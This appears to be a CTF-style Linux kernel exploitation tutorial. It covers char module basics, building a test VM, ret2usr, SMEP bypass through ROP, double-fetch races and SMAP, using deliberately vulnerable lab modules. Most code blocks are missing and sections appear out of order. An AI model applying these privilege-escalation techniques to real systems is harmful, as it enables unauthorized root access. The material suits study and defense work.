Heavily beta
Writing a Char Module is surprisingly simple. First, we specify what happens on init
(loading of the module) and exit
(unloading of the module). We need some special headers for this.
It looks simple, because it is simple. For now, anyway.
First we set the license, because otherwise we get a warning, and I hate warnings. Next we tell the module what to do on load (intro_init()
) and unload (intro_exit()
). Note we put parameters as void
, this is because kernel modules are very picky about requiring parameters (even if just void).
We then register the purposes of the functions using module_init()
and module_exit()
.
Note that we use printk
rather than printf
. GLIBC doesn't exist in kernel mode, so instead we use the kernel's own built-in functions. KERN_ALERT
specifies the type of message sent, and there are many more types.
Compiling a Kernel Object can seem a little more complex as we use a Makefile
, but it's surprisingly simple:
$(MAKE)
is a special variable that effectively calls make
, but it propagates all the same flags that our Makefile
was called with. So, for example, if we call
Then $(MAKE)
will become make -j 8
. Essentially, $(MAKE)
is make
, which compiles the module. The files produced are defined at the top as obj-m
. Note that a module is compiled against one specific kernel, which is why the build process points at the build directory of your own kernel.
Now we've got a ko
file compiled, we can add it to the list of active modules:
If it's successful, there will be no response. But where did it print to?
Remember, the kernel program has no concept of userspace; it does not know you ran it, nor does it bother communicating with userspace. Instead, this code runs in the kernel, and we can check the output using sudo dmesg
.
Here we grab the last line using tail
- as you can see, our printk
is called!
Now let's unload the module:
And there our intro_exit
is called.
You can view currently loaded modules using the lsmod
command
A more useful way to interact with the driver
Linux contains a syscall called ioctl
, which is often used to communicate with a driver. ioctl()
takes three parameters:
File Descriptor fd
an unsigned int
an unsigned long
The driver can be adapted to make the latter two virtually anything - perhaps a pointer to a struct or a string. In the driver source, the code looks along the lines of:
But if you want, you can interpret cmd
and arg
as pointers if that is how you wish your driver to work.
To communicate with the driver in this case, you would use the ioctl()
function, which you can import in C:
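Here's a minimal userspace sketch of that call. The helper name send_command is hypothetical and only there for illustration; the real parts are ioctl() itself and the sys/ioctl.h header.

```c
#include <sys/ioctl.h>

/*
 * Hypothetical helper: forward a command number and an argument to a driver.
 *   fd  - descriptor obtained by open()ing the device node
 *   cmd - driver-defined command number
 *   arg - driver-defined argument (a plain value, or a pointer cast to
 *         unsigned long if that is how the driver interprets it)
 * Returns whatever ioctl() returns: -1 on failure, with errno set.
 */
int send_command(int fd, unsigned long cmd, unsigned long arg)
{
    return ioctl(fd, cmd, arg);
}
```

What cmd and arg actually mean is entirely up to the driver, so the values you pass only make sense alongside the module's source.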
And you would have to update the file_operations
struct:
The kernel is the program at the heart of the Operating System. It is responsible for controlling every aspect of the computer, from the nature of syscalls to the integration between software and hardware. As such, exploiting the kernel can lead to some incredibly dangerous bugs.
In the context of CTFs, Linux kernel exploitation often involves the exploitation of kernel modules. This is an integral feature of Linux that allows users to extend the kernel with their own code, adding additional features.
You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow , and I recommend it highly.
Kernel Modules are written in C and compiled to a .ko
(Kernel Object) format. Most kernel modules are compiled for a specific kernel version (which can be checked with uname -r
, my Xenial Xerus is 4.15.0-128-generic
). We can load and unload these modules using the insmod
and rmmod
commands respectively. Kernel modules are often loaded into /dev/*
or /proc/
. There are 3 main module types: Char, Block and Network.
Char Modules are deceptively simple. Essentially, you can access them as a stream of bytes - just like a file - using syscalls such as open
. In this way, they're virtually dynamic files (at a super basic level), as the values read and written can be changed.
Examples of Char modules include /dev/random
.
I'll be using the term module and device interchangeably. As far as I can tell, they are the same, but please let me know if I'm wrong!
We're going to create a really basic authentication module that allows you to read the flag if you input the correct password. Here is the relevant code:
If we attempt to read()
from the device, it checks the authenticated
flag to see if it can return us the flag. If not, it sends back FAIL: Not Authenticated!
.
In order to update authenticated
, we have to write()
to the kernel module. What we attempt to write is compared to p4ssw0rd
. If it's not equal, nothing happens. If it is, authenticated
is updated and the next time we read()
it'll return the flag!
Let's first try and interact with the kernel by reading from it.
Make sure you sudo chmod 666 /dev/authentication
!
We'll start by opening the device and reading from it.
Note that in the module source code, the length of read()
is completely disregarded, so we could make it any number at all! Try switching it to 1
and you'll see.
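A minimal sketch of the open-and-read step, assuming the device node is readable by your user. The helper name read_device is made up for illustration; in this section the path you would pass is /dev/authentication.

```c
#include <fcntl.h>
#include <unistd.h>

/*
 * Open a device node, read up to len bytes into buf, then close it again.
 * Returns the number of bytes read, or -1 if open() or read() failed.
 */
ssize_t read_device(const char *path, char *buf, size_t len)
{
    int fd = open(path, O_RDWR);
    if (fd < 0)
        return -1;

    /* The module decides how much it really writes back, whatever len is. */
    ssize_t n = read(fd, buf, len);
    close(fd);
    return n;
}
```

Checking the return value of open() is worth the extra lines: a forgotten chmod shows up as a -1 here rather than as a confusing empty buffer.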
After compiling, we get that we are not authenticated:
Epic! Let's write the correct password to the device then try again. It's really important to send the null byte here! That's because copy_from_user()
does not automatically add it, so the strcmp
will fail otherwise!
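The null byte point is easy to get wrong, so here is a small sketch of the write. The helper name send_password is hypothetical; the important part is the + 1 on the length.

```c
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/*
 * Write a password to a device node, including its terminating null byte.
 * Returns the number of bytes written, or -1 if open() or write() failed.
 */
ssize_t send_password(const char *path, const char *password)
{
    int fd = open(path, O_RDWR);
    if (fd < 0)
        return -1;

    /* strlen() does not count the terminator, so add 1 to send it too. */
    ssize_t n = write(fd, password, strlen(password) + 1);
    close(fd);
    return n;
}
```

Sending only strlen(password) bytes would leave the kernel-side buffer without a terminator, which is exactly the strcmp failure described above.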
It works!
Amazing! Now for something really important:
The state is preserved between connections! Because the kernel module remains on, you will be authenticated until the module is reloaded (either via rmmod
then insmod
, or a system restart).
So, here's your challenge! Write the same kernel module, but using ioctl
instead. Then write a program to interact with it and perform the same operations. ZIP file including both below, but no cheating! This is really good practice.
Creating an interactive char driver is surprisingly simple, but there are a few traps along the way.
This is by far the hardest part to understand, but honestly a full understanding isn't really necessary. The new intro_init
function looks like this:
A major number is essentially the unique identifier to the kernel module. You can specify it using the first parameter of register_chrdev
, but if you pass 0
it is automatically assigned an unused major number.
We then have to register the class and the device. In complete honesty, I don't quite understand what they do, but this code exposes the module to /dev/intro
.
Note that on an error it calls class_destroy
and unregister_chrdev
:
These additional classes and devices have to be cleaned up in the intro_exit
function, and we mark the major number as available:
In intro_init
, the first line may have been confusing:
The third parameter fops
is where all the magic happens, allowing us to create handlers for operations such as read
and write
. A really simple one would look something like:
The parameters to intro_read
may be a bit confusing, but the 2nd and 3rd ones line up with the 2nd and 3rd parameters for the read()
function itself:
We then use the function copy_to_user
to write QWERTY
to the buffer passed in as a parameter!
Create a really basic exploit.c
:
If the module is successfully loaded, the read()
call should read QWERTY
into buffer
:
Success!
On modern Linux kernel versions, .ioctl has been removed in favour of .unlocked_ioctl and .compat_ioctl. The former is the replacement for .ioctl
, with the latter allowing 32-bit processes to perform ioctl
calls on 64-bit systems. As a result, the new file_operations
is likely to look more like this:
Simply use sudo insmod
to load it.
Userspace exploitation often has the end goal of code execution. In the case of kernel exploitation, we already have code execution; our aim is to escalate privileges, so that when we spawn a shell (or do anything else) using execve("/bin/sh", NULL, NULL)
we are dropped as root
.
To understand this, we have to talk a little about how privileges and credentials work in Linux.
The cred
struct contains all the permissions a task holds. The ones that we care about are typically these:
These fields are all unsigned int
fields, and they represent what you would expect - the UID, GID, and a few other less common IDs for other operations (such as the FSUID, which is checked when accessing a file on the file system). As you can expect, overwriting one or more of these fields is likely a pretty desirable goal.
Note the __randomize_layout
here at the end! This is a compiler annotation that tells the build to shuffle the order of the fields each time the kernel is compiled (when structure layout randomisation is enabled), making it harder to target the structure!
The kernel needs to store information about each running task, and to do this it uses the task_struct
structure. Each kernel task has its own instance.
The task_struct
instances are stored in a linked list, with a global kernel variable init_task
pointing to the first one. Each task_struct
then points to the next.
Along with linking data, the task_struct
also (more importantly) stores real_cred
and cred
, which are both pointers to a cred
struct. The difference between the two is explained here:
In effect, cred
is the permission when we are trying to act on something, and real_cred
when something is trying to act on us. The majority of the time, both will point to the same structure, but a common exception is with setuid executables, which will modify cred
but not real_cred
.
So, which set of credentials do we want to target with an arbitrary write? Honestly, I'm not entirely sure - it feels as if we want to update cred
, as that will change our abilities to read and execute files. Despite that, I have seen writeups overwrite real_cred
, so perhaps I am wrong in that - though, again, they usually point to the same struct and therefore would have the same effect.
Once I work it out, I shall update this (TODO!).
As an alternative to overwriting cred
structs in the unpredictable kernel heap, we can call prepare_kernel_cred()
to generate a new valid cred
struct and commit_creds()
to overwrite the real_cred
and cred
of the current task_struct
.
The function can be found here, but there's not much to say - it creates a new cred
struct called new
then destroys the old
. It returns new
.
If NULL is passed as the argument, it will return a new set of credentials that match the init_task
credentials, which default to root credentials. This is very important, as it means that calling prepare_kernel_cred(0)
results in a new set of root creds!
This last part is actually not true on newer kernel versions - check out Debugging the Kernel Module section!
This function is found here, but ultimately it will update task->real_cred
and task->cred
to the new credentials:
Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.
This isn't necessary for learning how to write kernel exploits - all the important parts will be provided! This is just to help those hoping to write challenges of their own, or perhaps set up their own VMs for learning purposes.
There may be other requirements, I just already had them. Check here for the full list.
Use --depth 1
to only get the last commit.
Remove the current compilation configurations, as they are quite complex for our needs
Now we can create a minimal configuration, with almost all options disabled. A .config
file is generated with the least features and drivers possible.
We create a kconfig
file with the options we want to enable. An example is the following:
In order to update the minimal .config
with these options, we use the provided merge_config.sh
script:
That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage
. This is the same bzImage
that you get in CTF challenges.
When we compile kernel modules for our own kernel, we use the following Makefile
structure:
To compile it for a different kernel, all we do is change the -C
flag to point to the newly-compiled kernel rather than the system's:
The module is now compiled for the specific kernel version!
We now have a minimal kernel bzImage
and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.
To do this, we use busybox
, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.
We will download and extract busybox
; you can find the latest version here.
We also create an output folder for compiled versions.
Now compile it statically. We're going to use the menuconfig
option, so we can make some choices.
Once the menu loads, hit Enter
on Settings
. Hit the down arrow key until you reach the option Build static binary (no shared libs)
. Hit Space
to select it, and then Escape
twice to leave. Make sure you choose to save the configuration.
Now, make it with the new options
Now we make the file system.
The last thing missing is the classic init
script, which gets run on system load. A provisional one works fine for now:
Make it executable
Finally, we're going to bundle it into a cpio
archive, which is understood by QEMU.
The -not -name *.cpio
is there to prevent the archive from including itself
You can even compress the filesystem to a .cpio.gz
file, which QEMU also recognises
If we want to extract the cpio
archive (say, during a CTF) we can use this command:
Put bzImage
and initramfs.cpio
into the same folder. Write a short run.sh
script that loads QEMU:
Once we make this executable and run it, we get loaded into a VM!
Right now, we have a minimal Linux kernel we can boot, but if we try and work out who we are, it doesn't act quite as we expect it to:
This is because /etc/passwd
and /etc/group
don't exist, so we can just create those!
The final step is, of course, the loading of the kernel module. I will be using the module from my Double Fetch section for this step.
First, we copy the .ko
file to the filesystem root. Then we modify the init
script to load it, and also set the UID of the loaded shell to 1000
(so we are not root!).
Here I am assuming that the major number of the double_fetch
module is 253
.
Why am I doing that?
If we load into a shell and run cat /proc/devices
, we can see that double_fetch
is loaded with major number 253
every time. I can't find any way to load this in without guessing the major number, so we're sticking with this for now - please get in touch if you find one!
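One possible way around hard-coding the number, offered as an untested idea rather than a recipe: read the major number out of /proc/devices at runtime. The sketch below only does the parsing; the function name find_major is hypothetical, and it assumes each entry has the form "<major> <name>" as shown by cat /proc/devices.

```c
#include <stdio.h>
#include <string.h>

/*
 * Scan text in the format of /proc/devices ("<major> <name>" per line)
 * and return the major number registered under name, or -1 if absent.
 */
int find_major(FILE *devices, const char *name)
{
    char line[128];
    char dev[64];
    int major;

    while (fgets(line, sizeof line, devices) != NULL) {
        /* Headers such as "Character devices:" and blank lines fail to
         * parse as "<number> <word>" and are simply skipped. */
        if (sscanf(line, "%d %63s", &major, dev) == 2 && strcmp(dev, name) == 0)
            return major;
    }
    return -1;
}
```

You would pass it the result of fopen("/proc/devices", "r") and the module's registered name, then use the returned number when creating the device node.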
If we want to compile a kernel version that is not the latest, we'll dump all the tags:
It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:
We then continue from there.
Some tags seem to not have the correct header files for compilation. Others, weirdly, compile kernels that build, but then never load in QEMU. I'm not quite sure why, to be frank.
Supervisor Memory Execute Protection
If ret2usr is analogous to ret2shellcode, then SMEP is the new NX. SMEP is a primitive protection that ensures any code executed in kernel mode is located in kernel space. This means a simple ROP back to our own shellcode no longer works. To bypass SMEP, we have to use gadgets located in the kernel to achieve what we want to (without switching to userland code).
In older kernel versions we could use ROP to disable SMEP entirely, but this has been patched out. This was possible because SMEP is determined by the 20th bit of the CR4 register, meaning that if we can control CR4 we can disable SMEP from messing with our exploit.
We can enable SMEP in the kernel by controlling the respective QEMU flag (qemu64
is not notable):
An old technique
Using the same setup as ret2usr, we make one single modification in run.sh
:
Now if we load the VM and run our exploit from last time, we get a kernel panic.
It's worth noting what it looks like for the future - especially these 3 lines:
So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: native_write_cr4(val)
. This function quite literally overwrites CR4.
Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms
(if we update init
to log us in as root
):
Ok, it's located at 0xffffffff8102b6d0
. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:
CR4 is currently 0x00000000001006b0
. If we clear bit 20 (counting from the least significant bit, zero-indexed) we get 0x6b0
.
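The arithmetic is a single mask operation. A small sketch (the names CR4_SMEP_BIT and cr4_without_smep are my own, purely for illustration):

```c
#include <stdint.h>

#define CR4_SMEP_BIT 20  /* zero-indexed, counting from the least significant bit */

/* Return the CR4 value with the SMEP bit cleared and every other bit untouched. */
uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~(UINT64_C(1) << CR4_SMEP_BIT);
}
```

Feeding it the 0x1006b0 from the panic gives the 0x6b0 we want to write.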
The last thing we need to do is find some gadgets. To do this, we have to convert the bzImage
file into a vmlinux
ELF file so that we can run ropper
or ROPgadget
on it. To do this, we can run extract-vmlinux
, from the official Linux git repository.
All that changes in the exploit is the overflow:
We can then compile it and run.
This fails. Why?
If we look at the resulting kernel panic, we meet an old friend:
SMEP is enabled again. How? If we debug the exploit, we definitely hit both the gadget and the call to native_write_cr4()
. What gives?
Well, if we look at the source, there's another feature:
Essentially, it will check if the val
that we input disables any of the bits defined in cr4_pinned_bits
. This value is set on boot, and effectively stops "sensitive CR bits" from being modified. If they are, the change is reverted and the pinned bits are restored. Effectively, modifying CR4 doesn't work any longer - and hasn't since version 5.3-rc1.
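To make the effect concrete, here is a simplified userspace model of the pinning logic. This is not the kernel source: the function name and parameters are my own, and treating SMEP as the only pinned bit is an assumption made for the example.

```c
#include <stdint.h>

/*
 * Simplified model of CR4 pinning (NOT the real kernel code).
 *   requested   - the value the caller tries to write to CR4
 *   pinned_mask - which bits are pinned
 *   pinned_bits - the values those bits were pinned to at boot
 * Returns the value that would actually end up in the register.
 */
uint64_t cr4_after_pinning(uint64_t requested, uint64_t pinned_mask,
                           uint64_t pinned_bits)
{
    if ((requested & pinned_mask) != pinned_bits) {
        /* Keep the unpinned bits as requested, force the pinned ones back. */
        requested = (requested & ~pinned_mask) | pinned_bits;
    }
    return requested;
}
```

With bit 20 pinned, asking for 0x6b0 in this model hands back 0x1006b0, which matches the panic showing SMEP still enabled after our write.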
Bypassing SMEP by ropping through the kernel
The previous approach failed, so let's try and escalate privileges using purely ROP.
First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0)
:
Now comes the trickiest part, which involves moving the result from RAX to RDI before calling commit_creds()
.
This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!
I ended up combining these four gadgets:
Gadget 1 is used to set RDX to 0
, so we bypass the jne
in Gadget 2 and hit ret
Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX
Gadget 4 moves it from RAX to RDI, then compares RDI to RDX. We need these to be equal to bypass the jne
and hit the ret
Recall that we need swapgs
and then iretq
. Both can be found easily.
The pop rbp; ret
is not important as iretq
jumps away anyway.
To simulate the pushing of RIP, CS, SS, etc we just create the stack layout as it would expect - RIP|CS|RFLAGS|SP|SS
, the reverse of the order they are pushed in.
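As a sketch of that layout, here are the five qwords written in the order iretq pops them. The function name build_iret_frame is hypothetical; in a real chain these values would simply be appended after the iretq gadget.

```c
#include <stdint.h>

/*
 * Fill frame[] with the five values iretq expects on the stack,
 * lowest address first: RIP, CS, RFLAGS, RSP, SS.
 */
void build_iret_frame(uint64_t frame[5], uint64_t rip, uint64_t cs,
                      uint64_t rflags, uint64_t rsp, uint64_t ss)
{
    frame[0] = rip;     /* where userland execution resumes, e.g. get_shell */
    frame[1] = cs;      /* saved user code segment */
    frame[2] = rflags;  /* saved user flags */
    frame[3] = rsp;     /* saved user stack pointer */
    frame[4] = ss;      /* saved user stack segment */
}
```

The CS, RFLAGS, RSP and SS values should be the ones saved from userland at the start of the exploit, not made-up constants.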
If we try this now, we successfully escalate privileges!
TODO
The most simple of vulnerabilities
A double-fetch vulnerability is when data is accessed from userspace multiple times. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.
Let's start with a convoluted example, where all we want to do is change the id
that the module stores. We are not allowed to set it to 0
, as that is the ID of root
, but all other values are allowed.
The code below will be the contents of the write()
function of a kernel module. I've removed the boilerplate code mentioned previously, but here are the relevant parts:
The program will:
Check if the ID we are attempting to switch to is 0
If it is, it doesn't allow us, as we attempted to log in as root
Sleep for 1 second (this is just to illustrate the example better, we will remove it later)
Compare the password to p4ssw0rd
If it is, it will set the id
variable to the id
in the creds
structure
Let's say we want to communicate with the module, and we set up a simple C program to do so:
We compile this statically (as there are no shared libraries on our VM):
As expected, the id
variable gets set to 900
- we can check this in dmesg
:
That all works fine.
The flaw here is that creds->id
is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials
struct:
This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials
struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.
Because this struct is controlled by the user, they have the power to change it whenever they like.
The kernel module uses the id
field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0
):
And once more, to set the id
variable:
Again, this might seem fine - but it's not. What is stopping it from changing in between these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.
In between the two dereferences of creds->id
, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race condition - the aim is to switch id
in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900
), but by the time it is copied to id
, it will have become 0
and we have bypassed the security check.
Here's the plan, visually, if it helps:
In the waiting period, we swap out the id
.
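If the timing is hard to picture, here is a deterministic userspace model of the bug. It is not the module's code: the names are hypothetical, and a callback stands in for the second thread so that the "race" happens at a known point.

```c
#include <stddef.h>

typedef void (*race_hook)(volatile int *shared_id);

/*
 * Model of the flawed handler. shared_id stands in for creds->id, which
 * lives in memory the "user" controls. hook runs between the check and the
 * use, playing the role of the racing thread.
 * Returns the ID that gets stored, or -1 if the request was rejected.
 */
int vulnerable_set_id(volatile int *shared_id, race_hook hook)
{
    if (*shared_id == 0)    /* first fetch: the security check */
        return -1;

    if (hook != NULL)
        hook(shared_id);    /* the race window */

    return *shared_id;      /* second fetch: the value actually used */
}

/* The "attacker": flip the ID to 0 (root) inside the window. */
void flip_to_root(volatile int *shared_id)
{
    *shared_id = 0;
}
```

Starting from an ID of 900, calling the handler with flip_to_root as the hook passes the check and still ends up storing 0, which is the whole vulnerability in miniature.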
If you are trying to compile your own kernel, you need CONFIG_SMP
enabled, because we need to modify it in a different thread! Additionally, you need QEMU to have the flag -smp 2
(or more) to enable 2 cores, though it may default to having multiple even without the flag. This example may work without SMP, but that's because of the sleep - when we move on to part 2, with no sleep, we require multiple cores.
The C program will hang on write
until the kernel module returns, so we can't use the main thread.
With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id
!
We have to compile it statically, as the VM has no shared libraries.
Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio
archive (you may want to do this in another folder):
Now copy exploit
there and make sure it's marked executable. You can then compress the filesystem again:
Use the newly-created initramfs.cpio
to launch the VM with run.sh
. Executing exploit
, it is successful!
Note that the VM loaded you in as root
by default. This is for debugging purposes, as it allows you to use utilities such as dmesg
to read the kernel module output and check for errors, as well as a host of other things we will talk about. When testing exploits, it's always helpful to fix the init
script to load you in as root! Just don't forget to test it as another user in the end.
Removing the artificial sleep
In reality, there won't be a 1-second sleep for your race condition to occur. This means we instead have to hope that it occurs in the assembly instructions between the two dereferences!
This will not work every time - in fact, it's quite likely to not work! - so we will instead have two loops; one that keeps writing 0
to the ID, and another that writes another value - e.g. 900
- and then calling write
. The aim is for the thread that switches to 0
to sync up so perfectly that the switch occurs in between the ID check and the ID "assignment".
If we check the source, we can see that there is no msleep
any longer:
Our exploit is going to look slightly different! We'll create the Credentials
struct again and set the ID to 900
:
Then we are going to write this struct to the module repeatedly. We will loop it 1,000,000 times (effectively infinite) to make sure it terminates:
If the ID returned is 0
, we won the race! It is really important to keep in mind exactly what the "success" condition is, and how you can check for it.
Now, in the second thread, we will constantly cycle between ID 900
and 0
. We do this in the hope that it will be 900
on the first dereference, and 0
on the second! I make this loop infinite because it is a thread, and the thread will be killed when the program is (provided you remove pthread_join()
! Otherwise your main thread will wait forever for the second to stop!).
Compile the exploit and run it, we get the desired result:
Look how quick that was! Insane - two fails, then a success!
You might be wondering how tight the race window can be for exploitation - well, gnote
from TokyoWesterns CTF 2019 had a race of two assembly instructions:
The dereferences [rbx]
have just one assembly instruction between, yet we are capable of racing. THAT is just how tight!
ROPpety boppety, but now in the kernel
By and large, the principle of userland ROP holds strong in the kernel. We still want to overwrite the return pointer, the only question is where.
The most basic of examples is the ret2usr technique, which is analogous to ret2shellcode - we write our own assembly that calls commit_creds(prepare_kernel_cred(0))
, and overwrite the return pointer to point there.
Note that the kernel version here is 6.1, due to some added protections we will come to later.
The relevant code is here:
As we can see, it's a size 0x100
memcpy
into an 0x20
buffer. Not the hardest thing in the world to spot. The second printk
call here is so that buffer
is used somewhere, otherwise it's just optimised out by the compiler
and the entire function just becomes xor eax, eax; ret
!
Firstly, we want to find the location of prepare_kernel_cred()
and commit_creds()
. We can do this by reading /proc/kallsyms
, a file that contains all of the kernel symbols and their locations (including those of our kernel modules!). This will remain constant, as we have disabled KASLR.
For obvious reasons, you require root permissions to read this file!
Now we know the locations of the two important functions: After that, the assembly is pretty simple. First we call prepare_kernel_cred(0)
:
Then we call commit_creds()
on the result (which is stored in RAX):
We can throw this directly into the C code using inline assembly:
The next step is overflowing. The 7th qword
overwrites RIP:
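A sketch of building that payload in userspace. The names RIP_INDEX and build_overflow are my own; the only fact taken from the text is that the 7th qword lands on the saved return pointer.

```c
#include <stddef.h>
#include <stdint.h>

#define RIP_INDEX 6  /* the 7th qword, zero-indexed */

/*
 * Fill payload[] with filler up to the saved return pointer, then place
 * target (the address we want the kernel to return to) on top of it.
 */
void build_overflow(uint64_t payload[RIP_INDEX + 1], uint64_t target)
{
    for (size_t i = 0; i < RIP_INDEX; i++)
        payload[i] = UINT64_C(0x4141414141414141);  /* 'AAAAAAAA' filler */

    payload[RIP_INDEX] = target;
}
```

The payload is then sent to the module with write(), with target set to the address of the privilege escalation function.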
Finally, we create a get_shell()
function we call at the end, once we've escalated privileges:
If we run what we have so far, we fail and the kernel panics. Why is this?
The reason is that once the kernel executes commit_creds()
, it doesn't return back to user space - instead it'll pop the next junk off the stack, which causes the kernel to crash and panic! You can see this happening while you debug (which we'll cover soon).
What we have to do is force the kernel to swap back to user mode. The way we do this is by saving the initial userland register state from the start of the program execution, then once we have escalated privileges in kernel mode, we restore the registers to swap to user mode. This reverts execution to the exact state it was before we ever entered kernel mode!
We can store them as follows:
The CS, SS, RSP and RFLAGS registers are stored in 64-bit values within the program. To restore them, we append extra assembly instructions in escalate()
for after the privileges are acquired:
Here the GS, CS, SS, RSP and RFLAGS registers are restored to bring us back to user mode (GS via the swapgs
instruction). The RIP register is updated to point to get_shell
and pop a shell.
If we compile it statically and load it into the initramfs.cpio
, notice that our privileges are elevated!
We have successfully exploited a ret2usr!
How exactly does the above assembly code restore registers, and why does it return us to user space? To understand this, we have to know what all of the registers do. The switch to kernel mode is best explained by a literal StackOverflow post, or another one.
GS - limited segmentation. The contents of the GS register are swapped with one of the MSRs (model-specific registers); at the entry to a kernel-space routine, swapgs
enables the process to obtain a pointer to kernel data structures.
Has to swap back to user space
SS - Stack Segment
Defines where the stack is stored
Must be reverted back to the userland stack
RSP
Same as above, really
CS - Code Segment
Defines the memory location that instructions are stored in
Must point to our user space code
RFLAGS - various things
GS is changed back via the swapgs
instruction. All others are changed back via iretq
, the QWORD variant of the iret
family of Intel instructions. The intent behind iretq
is to be the way to return from exceptions, and it is specifically designed for this purpose, as seen in Vol. 2A 3-541 of the Intel Software Developer’s Manual:
Returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task. (A nested task is created when a CALL instruction is used to initiate a task switch or when an interrupt or exception causes a task switch to an interrupt or exception handler.)
[...]
During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.
As we can see, it pops all the registers off the stack, which is why we push the saved values in that specific order. It may be possible to restore them sequentially without this instruction, but that increases the likelihood of things going wrong as one restoration may have an adverse effect on the following - much better to just use iretq
.
The final version
A practical example
Let's try and run our previous code, but with the latest kernel version (as of writing, 6.10-rc5
). The offsets of commit_creds
and prepare_kernel_cred()
are as follows, and we'll update exploit.c
with the new values:
The major number needs to be updated to 253
in init
for this version! I've done it automatically, but it bears remembering if you ever try to create your own module.
Instead of an elevated shell, we get a kernel panic, with the following data dump:
I could have left this part out of my blog, but it's valuable to know a bit more about debugging the kernel and reading error messages. I actually came across this issue while trying to get the previous section working, so it happens to all of us!
One thing that we can notice is that the error here is listed as a NULL pointer dereference error. We can see that the error is thrown in commit_creds()
:
We can check the source here, but chances are that the parameter passed to commit_creds()
is NULL - this appears to be the case, since RDI is shown to be 0
above!
In our run.sh
script, we now include the -s
flag. This flag opens up a GDB server on port 1234
, so we can connect to it and debug the kernel. Another useful flag is -S
, which will automatically pause the kernel on load to allow us to debug, but that's not necessary here.
What we'll do is pause our exploit
binary just before the write()
call by using getchar()
, which will hang until we hit Enter
or something similar. Once it pauses, we'll hook on with GDB. Knowing the address of commit_creds()
is 0xffffffff81077390
, we can set a breakpoint there.
We then continue with c
and go back to the VM terminal, where we hit Enter
to continue the exploit. Coming back to GDB, it has hit the breakpoint, and we can see that RDI is indeed 0
:
This explains the NULL dereference. RAX is also 0
, in fact, so it's not a problem with the mov
:
This means that prepare_kernel_cred()
is returning NULL
. Why is that? It didn't do that before!
Let's compare the differences in prepare_kernel_cred()
code between kernel version 6.1 and version 6.10:
The last and first parts are effectively identical, so there's no issue there. The issue arises in the way it handles a NULL argument. On 6.1, it treats it as using init_task
:
i.e. if daemon
is NULL, use init_task
. On 6.10, the behaviour is altogether different:
If daemon
is NULL, return NULL - hence our issue!
Unfortunately, there's no way to bypass this easily! We can fake cred
structs, and if we can leak init_task
we can use that memory address as well, but it's no longer as simple as calling prepare_kernel_cred(0)
!
Supervisor Memory Access Protection
SMAP is a more powerful version of SMEP. Instead of preventing code in user space from being executed, SMAP places heavy restrictions on accessing user space at all, even for accessing data. SMAP blocks the kernel from even dereferencing (i.e. accessing) data that isn't in kernel space unless it is done through a set of very specific functions.
For example, functions such as strcpy
or memcpy
do not work for copying data to and from user space when SMAP is enabled. Instead, we are provided the functions copy_from_user
and copy_to_user
, which are allowed to briefly bypass SMAP for the duration of their operation. These functions also have additional hardening against attacks such as buffer overflows, with the function __copy_overflow
acting as a guard against them.
This means that whether you interact using write
/read
or ioctl
, the structs that you pass via pointers all get copied to kernel space using these functions before they are messed around with. This also means that double-fetches are even more unlikely to occur as all operations are based on the snapshot of the data that the module took when copy_from_user
was called (unless copy_from_user
is called on the same struct multiple times).
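Here is a small userspace model of why the snapshot helps. It is an illustration only, with hypothetical names: a single read into a local variable stands in for copy_from_user(), and a callback stands in for the racing thread.

```c
#include <stddef.h>

typedef void (*race_hook)(volatile int *shared_id);

/*
 * Model of a handler that takes one snapshot of the user's value and then
 * only ever works on its own copy.
 * Returns the ID that gets stored, or -1 if the request was rejected.
 */
int snapshot_set_id(volatile int *shared_id, race_hook hook)
{
    int local_id = *shared_id;  /* single fetch: stands in for copy_from_user() */

    if (local_id == 0)          /* check the private copy */
        return -1;

    if (hook != NULL)
        hook(shared_id);        /* the racing write no longer affects us */

    return local_id;            /* use the same private copy */
}

/* The "attacker": flip the shared ID to 0 (root) inside the window. */
void flip_to_root(volatile int *shared_id)
{
    *shared_id = 0;
}
```

The attacker can still change their own memory, but the value that was checked is the value that gets used, so the flip comes too late to matter.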
Like SMEP, SMAP is controlled by the CR4 register, in this case the 21st bit. It is also pinned, so overwriting CR4 does nothing, and instead we have to work around it. There is no specific "bypass", it will depend on the challenge and will simply have to be accounted for.
Enabling SMAP is just as easy as SMEP: